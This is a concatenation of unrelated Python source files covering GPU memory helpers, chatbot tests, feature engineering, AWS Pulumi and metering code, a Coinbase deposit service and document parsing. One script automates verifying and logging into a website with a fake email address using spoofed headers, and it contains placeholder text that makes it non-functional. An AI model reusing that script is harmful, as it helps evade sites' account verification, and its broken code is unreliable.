def print_gpu_meminfo_all():
"""
Prints memory information about all available CUDA GPUs.
"""
gpus = cuda.gpus.lst
for gpu in gpus:
print_gpu_meminfo(gpu)
def print_gpu_meminfo(gpu):
"""
Prints memory information about the GPU.
Parameters :
------------
gpu : object
A numba cuda gpu context object.
"""
with gpu:
meminfo = cuda.current_context().get_memory_info()
print("GPU: %s, free: %s Mbytes, total: %s Mbytes \
" % (gpu, meminfo[0]*1e-6, meminfo[1]*1e-6))
def catch_gpu_memory_error( f ):
"""
Decorator that calls the function `f` and catches any GPU memory
error, during the execution of f.
If a memory error occurs, this decorator prints a corresponding message
and aborts the simulation (using MPI abort if needed)
"""
# Redefine the original function by calling it within a try/except
def g(*args, **kwargs):
try:
return f(*args, **kwargs)
except OutOfMemoryError as e:
handle_cuda_memory_error( e, f.__name__ )
# Decorator: return the new function
return(g)
def handle_cuda_memory_error( exception, function_name ):
"""
Print a message indicating which GPU went out of memory,
and abort the simulation (using MPI Abort if needed)
"""
# Print a useful message
message = '\nERROR: GPU reached OUT_OF_MEMORY'
if MPI.COMM_WORLD.size > 1:
message += ' on MPI rank %d' %MPI.COMM_WORLD.rank
message += '\n(Error occured in fbpic function `%s`)\n' %function_name
sys.stdout.write(message)
sys.stdout.flush()
# Abort the simulation
if MPI.COMM_WORLD.size > 1:
MPI.COMM_WORLD.Abort()
else:
raise( exception )
|
import unittest.mock
from programy.clients.config import ClientConfigurationData
from programy.clients.events.client import EventBotClient
from programytest.clients.arguments import MockArgumentParser
class MockEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
class MockRunningEventBotClient(EventBotClient):
def __init__(self, id, argument_parser=None):
EventBotClient.__init__(self, id, argument_parser)
self.prior = False
self.ran = False
self.post = False
def get_client_configuration(self):
return ClientConfigurationData("events")
def load_license_keys(self):
pass
def prior_to_run_loop(self):
self.prior = True
def wait_and_answer(self):
self.ran = True
def post_run_loop(self):
self.post = True
class EventBotClientTests(unittest.TestCase):
def test_init_raw(self):
arguments = MockArgumentParser()
with self.assertRaises(NotImplementedError):
client = EventBotClient("testevents", arguments)
def test_init_actual(self):
arguments = MockArgumentParser()
client = MockEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
with self.assertRaises(NotImplementedError):
client.wait_and_answer()
def test_init_running(self):
arguments = MockArgumentParser()
client = MockRunningEventBotClient("testevents", arguments)
self.assertIsNotNone(client)
client.run()
self.assertTrue(client.prior)
self.assertTrue(client.ran)
self.assertTrue(client.post)
|
import numpy as np
import pandas as pd
from sklearn.preprocessing import LabelEncoder
## load the data
train = pd.read_csv('../temporal_data/train_id.csv')
test = pd.read_csv('../temporal_data/test_id.csv')
song = pd.read_csv('../temporal_data/songs_id_cnt.csv')
data = train[['msno', 'song_id']].append(test[['msno', 'song_id']])
print('Data loaded.')
## isrc process
isrc = song['isrc']
song['cc'] = isrc.str.slice(0, 2)
song['xxx'] = isrc.str.slice(2, 5)
song['yy'] = isrc.str.slice(5, 7).astype(float)
song['yy'] = song['yy'].apply(lambda x: 2000+x if x < 18 else 1900+x)
song['cc'] = LabelEncoder().fit_transform(song['cc'].astype(str))
song['xxx'] = LabelEncoder().fit_transform(song['xxx'].astype(str))
song['isrc_missing'] = (song['cc'] == 0) * 1.0
## song_cnt
# 根据歌曲国家划分歌曲
song_cc_cnt = song.groupby(by='cc').count()['song_id'].to_dict()
song_cc_cnt[0] = None
song['cc_song_cnt'] = song['cc'].apply(lambda x: song_cc_cnt[x] if not np.isnan(x) else None)
# 根据歌曲出版商划分歌曲
song_xxx_cnt = song.groupby(by='xxx').count()['song_id'].to_dict()
song_xxx_cnt[0] = None
song['xxx_song_cnt'] = song['xxx'].apply(lambda x: song_xxx_cnt[x] if not np.isnan(x) else None)
# 根据歌曲年份划分歌曲
song_yy_cnt = song.groupby(by='yy').count()['song_id'].to_dict()
song_yy_cnt[0] = None
song['yy_song_cnt'] = song['yy'].apply(lambda x: song_yy_cnt[x] if not np.isnan(x) else None)
data = data.merge(song, on='song_id', how='left')
# 每个国家被多少用户听过
song_cc_cnt = data.groupby(by='cc').count()['msno'].to_dict()
song_cc_cnt[0] = None
song['cc_rec_cnt'] = song['cc'].apply(lambda x: song_cc_cnt[x] if not np.isnan(x) else None)
# 每个出版商被多少用户听过
song_xxx_cnt = data.groupby(by='xxx').count()['msno'].to_dict()
song_xxx_cnt[0] = None
song['xxx_rec_cnt'] = song['xxx'].apply(lambda x: song_xxx_cnt[x] if not np.isnan(x) else None)
# 每个年份被多少用户听过
song_yy_cnt = data.groupby(by='yy').count()['msno'].to_dict()
song_yy_cnt[0] = None
song['yy_rec_cnt'] = song['yy'].apply(lambda x: song_yy_cnt[x] if not np.isnan(x) else None)
## to_csv
features = ['cc_song_cnt', 'xxx_song_cnt', 'yy_song_cnt', 'cc_rec_cnt', 'xxx_rec_cnt', 'yy_rec_cnt']
for feat in features:
song[feat] = np.log1p(song[feat])
# 删去歌曲 'name' 与 'isrc' 特征
song.drop(['name', 'isrc'], axis=1, inplace=True)
song.to_csv('../temporal_data/songs_id_cnt_isrc.csv', index=False)
|
#绑定用户有效期
BIND_USER_ACCESS_TOKEN_EXPIRES = 10*60 |
#!/usr/bin/env python
"""
This file enables the python-fire based commandline interface.
"""
from .module import RModule
from .package import RPackage
def rcli(path_module_or_package):
"""Commandline interface to R packages and functions in a file.
Examples:
---------
# with a package
rcli utils install_packages ggplot2
# with a file
rcli path/test.r some_function
"""
try:
cmp = RModule(path_module_or_package)
except ImportError:
try:
cmp = RPackage(path_module_or_package)
except ImportError:
raise ImportError(f'{path_module_or_package} not found.')
# needs to be initialised to work with fire
cmp._initialise()
return cmp
def _rcli():
try:
from fire import Fire
except ModuleNotFoundError:
raise ModuleNotFoundError(
'The commandline interface requires python-fire. (pip install fire)'
)
Fire(rcli)
return
if __name__ == "__main__":
_rcli()
|
# -*- coding: utf-8 -*-
from .configuration import (
cutoff_config,
cutoff_config_ecoinvent_row,
consequential_config,
)
from .filesystem import (
cache_data,
OutputDir,
save_intermediate_result,
save_specific_dataset,
)
from .io import extract_directory
from .logger import create_log, create_detailed_log
from .report import HTMLReport
from .results import SaveStrategy
from .utils import get_function_meta, validate_configuration
from collections.abc import Iterable, Sequence
import itertools
import logging
import shutil
import sys
import wrapt
logger = logging.getLogger('ocelot')
mapping = {
'cutoff': cutoff_config,
'cutoff_ecoinvent_row': cutoff_config_ecoinvent_row,
'consequential': consequential_config,
}
def apply_transformation(function, counter, data, output_dir, save_strategy, follow):
# A `function` can be a list of functions
if (isinstance(function, Iterable)
and not isinstance(function, wrapt.FunctionWrapper)):
for obj in function:
data = apply_transformation(obj, counter, data,
output_dir, save_strategy)
return data
else:
metadata = get_function_meta(function)
index = next(counter)
metadata.update(
index=index,
type="function start",
count=len(data),
)
logger.info(metadata)
print("Applying transformation {}".format(metadata['name']))
data = function(data)
metadata.update(
type="function end",
count=len(data)
)
if save_strategy(index):
save_intermediate_result(output_dir, index, data, metadata['name'])
if follow:
save_specific_dataset(output_dir, index, data,
follow, metadata['name'])
logger.info(metadata)
return data
def system_model(data_path, config=None, show=False, use_cache=True,
save_strategy=None, follow=None):
"""A system model is a set of assumptions and modeling choices that define how to take a list of unlinked and unallocated datasets, and transform these datasets into a new list of datasets which are linked and each have a single reference product.
The system model itself is a list of functions. The definition of this list - which functions are included, and in which order - is defined by the input parameter ``config``, which can be a list of functions or a :ref:`configuration` object. The ``system_model`` does the following:
* Extract data from the input data sources
* Initialize a :ref:`logger` object
* Then, for each transformation function in the provided configuration:
* Log the transformation function start
* Apply the transformation function
* Save the intermediate data state
* Log the transformation function end
* Finally, write a report.
Can be interrupted with CTRL-C. Interrupting will delete the partially completed report.
Args:
* ``datapath``: Filepath to directory of undefined dataset files.
* ``config``: System model choice. Default is cutoff system model.
* ``show``: Boolean flag to open the final report in a web browser after model completion.
* ``use_cache``: Boolean flag to use cached data instead of raw ecospold2 files when possible.
* ``save_strategy``: Optional input argument to initialize a ``SaveStrategy``.
* ``follow``: Optional filename of a file to follow (i.e. save after each transformation function) during system model execution.
Returns:
* An ``OutputDir`` object which tells you where the report was generated
* The final version of the data in a list
"""
print("Starting Ocelot model run")
if isinstance(config, str) and config in mapping:
config = mapping[config]
elif not config:
config = cutoff_config
config = validate_configuration(config)
data = extract_directory(data_path, use_cache)
output_manager = OutputDir(follow=follow)
try:
counter = itertools.count()
logfile_path = create_log(output_manager.directory)
create_detailed_log(output_manager.directory)
print("Opening log file at: {}".format(logfile_path))
logger.info({
'type': 'report start',
'uuid': output_manager.report_id,
'count': len(data),
})
save_strategy = SaveStrategy(save_strategy)
for obj in config:
data = apply_transformation(obj, counter, data,
output_manager.directory,
save_strategy, follow)
print("Saving final results")
save_intermediate_result(output_manager.directory, "final-results", data)
logger.info({'type': 'report end'})
print(("Compare results with: ocelot-compare compare {} "
"<reference results>").format(output_manager.report_id))
HTMLReport(logfile_path, show)
return output_manager, data
except KeyboardInterrupt:
print("Terminating Ocelot model run")
print("Deleting output directory:\n{}".format(output_manager.directory))
shutil.rmtree(output_manager.directory)
sys.exit(1)
|
import json
from time import time
import pulumi
import pulumi_aws
from pulumi_aws import apigateway, lambda_, s3
model_bucket = s3.Bucket("modelBucket")
model_object = s3.BucketObject("model",
bucket=model_bucket,
# The model comes from the pretrained model referenced in https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py
# Then, converted per https://github.com/pytorch/vision/issues/2068 (see convert.py)
# It's combined with labels.txt in a tgz.
source=pulumi.FileAsset("./model.tar.gz"))
instance_assume_role_policy = pulumi_aws.iam.get_policy_document(statements=[{
"actions": ["sts:AssumeRole"],
"principals": [{
"identifiers": ["lambda.amazonaws.com"],
"type": "Service",
}],
}])
role = pulumi_aws.iam.Role("classifier-fn-role",
assume_role_policy=instance_assume_role_policy.json,
)
policy = pulumi_aws.iam.RolePolicy("classifier-fn-policy",
role=role,
policy=pulumi.Output.from_input({
"Version": "2012-10-17",
"Statement": [{
"Action": ["logs:*", "cloudwatch:*"],
"Resource": "*",
"Effect": "Allow",
}, {
"Action": ["s3:*"],
"Resource": model_bucket.arn.apply(lambda b: f"{b}/*"),
"Effect": "Allow",
}],
}),
)
lambda_func = lambda_.Function("classifier-fn",
code=pulumi.AssetArchive({
".": pulumi.FileArchive("./app"),
}),
role=role.arn,
timeout=300,
memory_size=512,
runtime="python3.6",
handler="app.lambda_handler",
layers=["arn:aws:lambda:us-west-2:934676248949:layer:pytorchv1-py36:2"],
environment={
"variables": {
"MODEL_BUCKET": model_bucket.bucket,
"MODEL_KEY": model_object.key,
}
}
)
# The stage name to use for the API Gateway URL
custom_stage_name = "api"
# Create the Swagger spec for a proxy which forwards all HTTP requests through to the Lambda function.
def swagger_spec(lambda_arn):
swagger_spec_returns = {
"swagger": "2.0",
"info": {"title": "api", "version": "1.0"},
"paths": {
"/{proxy+}": swagger_route_handler(lambda_arn),
},
}
return json.dumps(swagger_spec_returns)
# Create a single Swagger spec route handler for a Lambda function.
def swagger_route_handler(lambda_arn):
region = pulumi_aws.config.region
uri_string = "arn:aws:apigateway:{region}:lambda:path/2015-03-31/functions/{lambdaArn}/invocations".format(
region=region, lambdaArn=lambda_arn)
return ({
"x-amazon-apigateway-any-method": {
"x-amazon-apigateway-integration": {
"uri": uri_string,
"passthroughBehavior": "when_no_match",
"httpMethod": "POST",
"type": "aws_proxy",
},
},
})
# Create the API Gateway Rest API, using a swagger spec.
rest_api = apigateway.RestApi("api",
body=lambda_func.arn.apply(lambda lambda_arn: swagger_spec(lambda_arn)),
)
# Create a deployment of the Rest API.
deployment = apigateway.Deployment("api-deployment",
rest_api=rest_api,
# Note: Set to empty to avoid creating an implicit stage, we'll create it
# explicitly below instead.
stage_name="")
# Create a stage, which is an addressable instance of the Rest API. Set it to point at the latest deployment.
stage = apigateway.Stage("api-stage",
rest_api=rest_api,
deployment=deployment,
stage_name=custom_stage_name,
)
# Give permissions from API Gateway to invoke the Lambda
invoke_permission = lambda_.Permission("api-lambda-permission",
action="lambda:invokeFunction",
function=lambda_func,
principal="apigateway.amazonaws.com",
source_arn=deployment.execution_arn.apply(
lambda execution_arn: execution_arn + "*/*"),
)
# Export the https endpoint of the running Rest API
pulumi.export("endpoint", deployment.invoke_url.apply(lambda url: url + custom_stage_name))
|
#!/usr/bin/python
import json
import logging
import os
import sys
import threading
from datetime import datetime
from decimal import Decimal
from time import sleep
import boto3
import pytz
from botocore.exceptions import ClientError
logger = logging.getLogger(__name__)
BOTO3_METERING_MARKETPLACE_CLIENT = 'meteringmarketplace'
class MeterUsageIntegration:
try:
_SEND_DIMENSIONS_AFTER = int(os.getenv("SEND_DIMENSIONS_AFTER", default=3600))
except ValueError:
_SEND_DIMENSIONS_AFTER = 3600
# Initializes the integration and starts a thread to send the metering
# information to AWS Marketplace
def __init__(self,
region_name,
product_code,
max_send_stop=2,
max_send_warning=1):
self._product_code = product_code
self._max_send_stop = max_send_stop
self._max_send_warning = max_send_warning
self.state = State(max_send_stop, max_send_warning,
self._SEND_DIMENSIONS_AFTER)
self._mms_client = boto3.client(BOTO3_METERING_MARKETPLACE_CLIENT,
region_name=region_name)
self._initializing = True
try:
self._check_connectivity_and_dimensions()
except ClientError as err:
self.state.type = "init"
self.state.add_error(err)
logger.error(err)
except:
self.state.type = "init"
self.state.add(f"{sys.exc_info()[1]}")
logger.error((f"{sys.exc_info()[1]}"))
t = threading.Thread(target=self.run)
t.start()
def run(self):
logger.info("Initializing")
if self.state.type != "init":
while True:
self.meter_usages()
self.update_state()
if self.state.type == "stop":
message = f"The usage couldn't be sent after {self._max_send_stop } tries. Please check that your product has a way to reach the internet."
self.state.add(message)
logger.error(message)
logger.info("Going to sleep")
sleep(self._SEND_DIMENSIONS_AFTER)
def get_consumption(self):
""" Returns all the dimensions from the AAP Controller unique host table """
dim_timestamp = datetime.utcnow().timestamp()
dim_timestamp_int = int(dim_timestamp)
dim_datetime = datetime.fromtimestamp(dim_timestamp).isoformat()
return {
"dimensions":[
{
"name": "aap-unique-hosts",
"quantity": 10,
"timestamp": dim_timestamp_int,
"datetime": dim_datetime
}
]
}
def get_state(self):
""" Returns the state """
return {"state": self.state}
def meter_usages(self, dry_run=False):
""" Obtain unique host count and sends it to Marketplace Metering Service (MMS) using the meter_usage method. """
logger.info(f"meter_usages: dry_run={dry_run}")
responses = []
for d in self.get_consumption().get("dimensions", []):
# If you call meter_usage at start time with 0 as quantity,
# you won't be able to send another a different quantity for the first hour.
# Dimensions can only be reported once per hour.
# We are avoiding this problem here
if (dry_run):
responses += [self._meter_usage(dimension=d, dry_run=dry_run)]
else:
if not (self._initializing and d.get("quantity", 0) == 0):
responses += [
self._meter_usage(dimension=d, dry_run=dry_run)
]
if (self._initializing):
logger.info(f"setting _initializing to False")
self._initializing = False
return responses
def get_status(self):
"""Gets the state of the integration component and the consumption (number of unique hosts) that hasn't been sent to the metering service yet"""
return {
"version": "1.0.0",
"consumption": self.get_consumption(),
"state": self.get_state()
}
def update_state(self):
get_latest_dimensions = self.get_consumption().get("dimensions", [])
for d in get_latest_dimensions:
if d.get("timestamp"):
self.state.update_type(d.get("timestamp"))
break
def _check_connectivity_and_dimensions(self):
""" Checks the connectivity and the dimensions given sending a dry_run call to the Marketplace Metering Service """
self.meter_usages(dry_run=True)
# Send the given dimension and quantity to Marketplace Metering Serverice
# using the meter_usage method. If the dimension is sent successfully,
# the quantity for the dimension is reset to 0 in the DB
# (Only if dry_run is false)
def _meter_usage(self, dimension, dry_run=False):
logger.info(f"_metering_usage: {dimension} ")
utc_now = datetime.utcnow()
try:
# response = self._mms_client.meter_usage(
# ProductCode=self._product_code,
# Timestamp=utc_now,
# UsageDimension=dimension.get("name"),
# UsageQuantity=int(dimension.get("quantity")),
# DryRun=dry_run)
print(f"ProductCode: {self._product_code}, Timestamp:{utc_now}, UsageDimension: {dimension.get('name')}, UsageQuantity: {int(dimension.get('quantity'))}")
response = {
"ResponseMetadata": {
"HTTPStatusCode": 200
}
}
status_code = response["ResponseMetadata"]["HTTPStatusCode"]
if (not dry_run and status_code == 200):
self.state.discard_dimension_errors(dimension.get("name"))
return response
except ClientError as err:
if (dry_run):
raise
self.state.add_error(err)
logger.error(err)
except:
if (dry_run):
raise
self.state.add(f"{sys.exc_info()[1]}")
logger.error((f"{sys.exc_info()[1]}"))
class State():
def __init__(self,
max_send_stop,
max_send_warning,
send_usage_after,
detail=None):
self.max_send_stop = max_send_stop
self.max_send_warning = max_send_warning
if detail is None:
detail = set()
self.details = detail
self.type = ""
self._send_usage_after = send_usage_after
def update_type(self, max_timestamp):
if self.type != "init":
utcnow = datetime.utcnow().timestamp()
if max_timestamp <= (utcnow -
self.max_send_stop * self._send_usage_after):
self.type = "stop"
elif max_timestamp <= (
utcnow - self.max_send_warning * self._send_usage_after):
self.type = "warning"
else:
self.type = ""
self.details = set()
def add(self, detail):
self.details.add(detail)
def value(self):
return (len(self.details) > 0)
def add_error(self, error):
self.add(error.response["Error"]["Code"] + ": " +
error.response["Error"]["Message"])
def discard_dimension_errors(self, dimension_name):
for detail in self.details.copy():
if (f"usageDimension: {dimension_name}" in detail):
self.details.discard(detail)
if (len(self.details) == 0):
self.type = ""
mui = MeterUsageIntegration(region_name="us-east-1", product_code="aap") |
import json
import math
import time
from typing import Union
import coinbasepro
from cbpa.logger import logger
from cbpa.schemas.account import AddFundsResponse
from cbpa.schemas.config import Config
from cbpa.schemas.currency import CCC, FCC
from cbpa.services.discord import DiscordService
class AccountService:
def __init__(
self, config: Config, coinbasepro_client: coinbasepro.AuthenticatedClient
) -> None:
self.coinbasepro_client = coinbasepro_client
self.config = config
self.discord = DiscordService()
def get_balance_for_currency(self, currency: Union[CCC, FCC]) -> int:
"""get_balance_for_currency
Assuming there will only every be one account for a currency identifier.
This account is not the same as a payment method.
Think of it as just the allocation of a currency.
"""
return [
math.floor(account["balance"])
for account in self.coinbasepro_client.get_accounts()
if account["currency"] == currency.value
][0]
def get_primary_buy_payment_method_id(self, fiat: FCC) -> str:
return [
primary_method["id"]
for primary_method in self.coinbasepro_client.get_payment_methods()
if primary_method["primary_buy"]
and primary_method["currency"] == fiat.value
][0]
def add_funds(
self,
buy_total: int,
current_funds: int,
max_fund: int,
fiat: FCC,
) -> AddFundsResponse:
if buy_total > max_fund:
message = (
f"Total cost is {buy_total} {fiat} but you "
f"have your limit set to {max_fund} {fiat}. "
"Unable to complete purchase. "
"Update your settings appropriately to make changes if necessary."
)
self.discord.send_alert(config=self.config, message=message)
return AddFundsResponse(status="Error", message=message)
else:
fund_amount = buy_total - current_funds
if current_funds > 1:
fund_amount = max_fund
fund_message = (
f"Your balance is {current_funds} {fiat}. "
f"A deposit of {fund_amount} {fiat} will be made "
"using your selected payment account."
)
logger.info(fund_message)
self.discord.send_alert(config=self.config, message=fund_message)
payment_id = self.get_primary_buy_payment_method_id(fiat=fiat)
if payment_id is None:
return AddFundsResponse(
status="Error", message="Could not determine payment account id."
)
else:
deposit = self.coinbasepro_client.deposit(
amount=fund_amount,
currency=fiat.value,
payment_method_id=payment_id,
)
logger.info("Sleeping for 10 seconds while the deposit completes.")
time.sleep(10)
return AddFundsResponse(
status="Success",
message=json.dumps(deposit, sort_keys=True, default=str),
)
|
'''
Author : Shreyak Upadhyay
Email : shreyakupadhyay07@gmail.com
Subject : get verified for target website .
Description:
send a get request to get verified for the target website.
'''
import logging
import requests
import re
import os
import sys
import time
from bs4 import BeautifulSoup
import json
logging.basicConfig(level=logging.DEBUG)
s = requests.Session()
def getVerified(LinkVerify):
headers = {
"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"accept-encoding":"gzip, deflate, sdch, br",
"accept-language":"en-US,en;q=0.8",
#"upgrade-insecure-requests":"1",
"user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
}
response = s.get(LinkVerify,headers=headers)
responseText = response.text
responseCookies = response.cookies
print (responseCookies)
"""
The line below is useful when there are some cookies which are there but you are able to get them using object.cookies.
"""
uid = requests.utils.dict_from_cookiejar(s.cookies)[key to the cookies]
print (uid)
dash_headers = {
"cache-control":"max-age=0, no-cache",
"cache-control":"no-cache",
"cf-ray":"2e5c0ada1b242dc7-BOM",
"content-encoding":"gzip",
"content-type":"text/html; charset=UTF-8",
"date":"Wed, 21 Sep 2016 08:10:45 GMT",
"server":"cloudflare-nginx",
"set-cookie": str(responseCookies),
"status":"200",
"vary":"Accept-Encoding",
"x-mod-pagespeed":"1.11.33.2-0",
"x-powered-by":"PHP/5.6.24"
}
"""
Put the link of the page to which you are getting directed after getting authenticated on the target website.
And you are done. You logged in into the target website using a fake mail.
"""
response_dash = s.get(Link after verification,headers=dash_headers)
print (response_dash.text)
getVerified(sys.argv[1]) |
from datetime import datetime
import os
import config.constants as constants
def resolve_survey_id_from_file_name(name):
return parse_filename(name)['survey_id']
#return name.rsplit("/", 2)[1]
def parse_filename(filename):
"""
Parse filename into dictionary that reflects different properties of its corrsponding object,
such as datatype and date of acquisition.
"""
filename = filename.rstrip()
file_object_dict = {'filename': filename}
file_values_list = filename.split('/')
# try to resolve whether it is a 'new' format or an 'old' format and handle approporiately
name, ext = os.path.splitext(os.path.basename(filename))
if ext and ext[0] == '.':
ext = ext[1:]
if not ext:
file_object_dict["file_type"] = constants.REGISTRATION_MARKER
elif ext in constants.ALLOWED_EXTENSIONS:
file_object_dict["file_extension"] = ext
# chunk data is always obvious, so lets start with that
if constants.CHUNKS_FOLDER in filename:
file_object_dict['file_type'] = constants.CHUNK_DATA
index_mapping = constants.CHUNK_PATH_MAPPING
else:
file_object_dict['file_type'] = constants.RAW_DATA
if constants.RAW_DATA_FOLDER in filename:
index_mapping = constants.NEW_RAW_PATH_MAPPING
else:
index_mapping = constants.OLD_RAW_PATH_MAPPING
file_object_dict['study_object_id'] = file_values_list[index_mapping['STUDY_ID_INDEX']]
file_object_dict['patient_id'] = file_values_list[index_mapping['PATIENT_ID_INDEX']]
if constants.IDENTIFIERS in file_values_list[index_mapping['DATA_TYPE_INDEX']]:
file_object_dict['data_type'] = constants.IDENTIFIERS
file_object_dict['datetime'] = file_values_list[index_mapping['DATA_TYPE_INDEX']].split('_')[-1][:-4]
else:
file_object_dict['datetime'] = file_values_list[index_mapping["FILE_NAME_INDEX"]].split('_')[-1][:-4]
if 'ios' in file_values_list[index_mapping['DATA_TYPE_INDEX']]:
file_object_dict['data_type'] = constants.IOS_LOG_FILE
else:
if file_object_dict['file_type'] == constants.CHUNK_DATA:
file_object_dict['data_type'] = file_values_list[index_mapping['DATA_TYPE_INDEX']]
else:
file_object_dict['data_type'] = constants.UPLOAD_FILE_TYPE_MAPPING[file_values_list[index_mapping['DATA_TYPE_INDEX']]]
if file_object_dict['data_type'] in [constants.SURVEY_ANSWERS, constants.SURVEY_TIMINGS, constants.VOICE_RECORDING, constants.IMAGE_FILE]:
# sometimes the survey id isn't in the filename, not sure why, but lets handle it anyway
if file_values_list[index_mapping['SURVEY_ID_INDEX']] != file_values_list[index_mapping["FILE_NAME_INDEX"]]:
file_object_dict['survey_id'] = file_values_list[index_mapping['SURVEY_ID_INDEX']]
else:
print('Could not find a survey id for {0}'.format(filename))
if file_object_dict['data_type'] == constants.IMAGE_FILE:
file_object_dict['image_survey_user_instance'] = file_values_list[index_mapping['IMAGE_SURVEY_USER_INSTANCE']]
else:
print('Extension is not appropriate {0}'.format(ext))
return file_object_dict
|
from synapse.tests.common import *
import synapse.axon as s_axon
import synapse.cortex as s_cortex
import synapse.daemon as s_daemon
import synapse.neuron as s_neuron
import synapse.tools.pushfile as s_pushfile
nullhash = hashlib.sha256(b'').digest()
visihash = hashlib.sha256(b'visi').digest()
class TestPushFile(SynTest):
def test_tools_pushfile(self):
with self.getAxonCore() as env:
nullpath = os.path.join(env.dirn, 'null.txt')
visipath = os.path.join(env.dirn, 'visi.txt')
with open(visipath, 'wb') as fd:
fd.write(b'visi')
outp = self.getTestOutp()
s_pushfile.main(['--tags', 'foo.bar,baz.faz', env.core_url, visipath], outp=outp)
node = env.core.getTufoByProp('file:bytes')
self.eq(node[1].get('file:bytes'), '442f602ecf8230b2a59a44b4f845be27')
self.eq(node[1].get('file:bytes:size'), 4)
self.nn(node[1].get('#foo'))
self.nn(node[1].get('#foo.bar'))
self.nn(node[1].get('#baz'))
self.nn(node[1].get('#baz.faz'))
# Ensure the axon got the bytes
self.eq(env.axon_client.wants((visihash,)), ())
self.eq(list(env.axon_client.bytes(visihash))[0], b'visi')
# Ensure user can't push a non-existant file and that it won't exist
self.raises(FileNotFoundError, s_pushfile.main, ['--tags', 'foo.bar,baz.faz', env.core_url, nullpath], outp=outp)
self.eq(env.axon_client.wants((nullhash,)), (nullhash,))
# Ensure user can push an empty file
with open(nullpath, 'wb') as fd:
fd.write(b'')
outp = self.getTestOutp()
s_pushfile.main(['--tags', 'foo.bar,baz.faz', env.core_url, nullpath], outp=outp)
node = env.core.getTufoByProp('file:bytes:sha256', ehex(nullhash))
self.istufo(node)
self.eq(env.axon_client.wants((nullhash,)), ())
self.eq(list(env.axon_client.bytes(nullhash)), [b''])
|
# -*- coding: utf-8 -*-
import shutil
from pathlib import Path
import pytest
import tempfile
from casperlabs_client import CasperLabsClient, key_holders
from casperlabs_client.consts import (
SUPPORTED_KEY_ALGORITHMS,
PUBLIC_KEY_FILENAME,
PRIVATE_KEY_FILENAME,
PUBLIC_KEY_HEX_FILENAME,
)
@pytest.fixture(scope="session")
def fake_wasm():
with tempfile.NamedTemporaryFile() as f:
yield f
@pytest.fixture(scope="session")
def account_keys_directory():
with tempfile.TemporaryDirectory() as directory:
for key_algorithm in SUPPORTED_KEY_ALGORITHMS:
client = CasperLabsClient()
client.keygen(directory, algorithm=key_algorithm)
for file_name in (
PUBLIC_KEY_FILENAME,
PUBLIC_KEY_HEX_FILENAME,
PRIVATE_KEY_FILENAME,
):
shutil.move(
Path(directory) / file_name,
Path(directory) / f"{key_algorithm}{file_name}",
)
yield Path(directory)
@pytest.fixture(scope="session")
def validator_keys_directory():
with tempfile.TemporaryDirectory() as directory:
client = CasperLabsClient()
client.validator_keygen(directory)
yield Path(directory)
def key_paths(algorithm, directory):
return (
directory / f"{algorithm}{PRIVATE_KEY_FILENAME}",
directory / f"{algorithm}{PUBLIC_KEY_FILENAME}",
)
@pytest.fixture(scope="session")
def account_keys(account_keys_directory):
algorithm_keys = {}
for algorithm in SUPPORTED_KEY_ALGORITHMS:
private_pem_path, public_pem_path = key_paths(algorithm, account_keys_directory)
key_holder = key_holders.class_from_algorithm(algorithm).from_private_key_path(
private_pem_path
)
keys_files = {
"private_pem": private_pem_path,
"public_pem": public_pem_path,
"key_holder": key_holder,
}
algorithm_keys[algorithm] = keys_files
return algorithm_keys
# Scoping this per call as we mock it.
@pytest.fixture
def client():
return CasperLabsClient()
|
# -*- coding: utf-8 -*-
from ....Classes.OutMag import OutMag
from ....Classes.Simulation import Simulation
from ....Methods.Simulation.Input import InputError
def gen_input(self):
"""Generate the input for the structural module (magnetic output)
Parameters
----------
self : InFlux
An InFlux object
"""
output = OutMag()
# get the simulation
if isinstance(self.parent, Simulation):
simu = self.parent
elif isinstance(self.parent.parent, Simulation):
simu = self.parent.parent
else:
raise InputError(
"ERROR: InputCurrent object should be inside a Simulation object"
)
# Set discretization
if self.OP is None:
N0 = None # N0 can be None if time isn't
else:
N0 = self.OP.N0
Time, Angle = self.comp_axes(simu.machine, N0)
output.Time = Time
output.Angle = Angle
if self.B is None:
raise InputError("ERROR: InFlux.B missing")
if self.B.name is None:
self.B.name = "Airgap flux density"
if self.B.symbol is None:
self.B.symbol = "B"
B = self.B.get_data()
output.B = B
if self.parent.parent is None:
raise InputError(
"ERROR: The Simulation object must be in an Output object to run"
)
# Save the Output in the correct place
self.parent.parent.mag = output
# Define the electrical Output to set the Operating Point
if self.OP is not None:
self.OP.gen_input()
|
from bs4 import BeautifulSoup
from dedoc.readers.docx_reader.data_structures.base_props import BaseProperties
def check_if_true(value: str) -> bool:
if value == '1' or value == 'True' or value == 'true':
return True
return False
def change_paragraph_properties(old_properties: BaseProperties, tree: BeautifulSoup) -> None:
"""
changes old properties indent, size, jc, spacing_before, spacing_after if they were found in tree
:param old_properties: Paragraph
:param tree: BeautifulSoup tree with properties
"""
change_indent(old_properties, tree)
change_size(old_properties, tree)
change_jc(old_properties, tree)
change_spacing(old_properties, tree)
def change_run_properties(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old properties: bold, italic, underlined, size if they were found in tree
:param old_properties: Run
:param tree: BeautifulSoup tree with properties
"""
change_size(old_properties, tree)
change_caps(old_properties, tree)
# bold
if tree.b:
b_tag = tree.b.get("w:val", True)
old_properties.bold = check_if_true(b_tag) if isinstance(b_tag, str) else b_tag
# italic
if tree.i:
i_tag = tree.i.get("w:val", True)
old_properties.italic = check_if_true(i_tag) if isinstance(i_tag, str) else i_tag
# underlined
if tree.u:
u_tag = tree.u.get("w:val", False)
if u_tag == 'none':
old_properties.underlined = False
elif isinstance(u_tag, str):
old_properties.underlined = True
# strike
if tree.strike:
strike_tag = tree.strike.get("w:val", True)
old_properties.strike = check_if_true(strike_tag) if isinstance(strike_tag, str) else strike_tag
# sub and superscript
if tree.vertAlign:
sub_super_script = tree.vertAlign.attrs.get("w:val")
if sub_super_script == "superscript":
old_properties.superscript = True
elif sub_super_script == "subscript":
old_properties.subscript = True
def change_indent(old_properties: "BaseProperties", tree: BeautifulSoup) -> None:
"""
changes old properties: indent if it was found in tree
:param old_properties: Paragraph
